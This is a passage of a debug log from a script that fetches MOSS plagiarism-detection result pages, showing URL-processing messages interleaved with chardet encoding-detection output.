http://moss.stanford.edu/results/374137986/match182.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match183.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match184.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match185.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match187.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match188.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match189.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match190.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match191.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match192.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match193.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match194.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match195.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match196.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match197.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match200.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match199.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match198.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match201.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match202.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match220.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match222.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match224.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match225.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match226.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match227.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match228.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match229.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match230.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match231.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match232.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match233.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match234.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match235.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match236.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match237.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match238.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match239.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match240.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match241.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match242.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match243.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match244.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match245.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match246.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match247.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match248.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match249.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 26425\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20318\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19286\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 26412\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 26425\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20305\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19273\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 26412\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23059\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20318\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19286\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23072\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 26412\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20305\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23059\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19273\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 26413\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23059\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20305\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19273\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 26412\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23060\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20306\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19274\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23059\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20305\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19273\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5338017868424185\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5190788803750156\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2-top.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5196959789580947\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2-0.html\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23417\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23404\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23417\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23404\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23404\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23405\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23404\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32873\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5168736950658681\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19967\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1-top.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32860\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19954\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32873\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19967\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32860\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19954\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19954\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32860\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19955\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19954\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32861\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32860\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5369503388353455\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5557286372017827\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.516668753076103\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1-1.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5537656378523245\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 27141\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 33956\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 27128\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 33943\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 27141\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 27128\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 33956\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 27128\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 33943\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 27129\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 33943\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 27128\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 33944\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 33943\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not 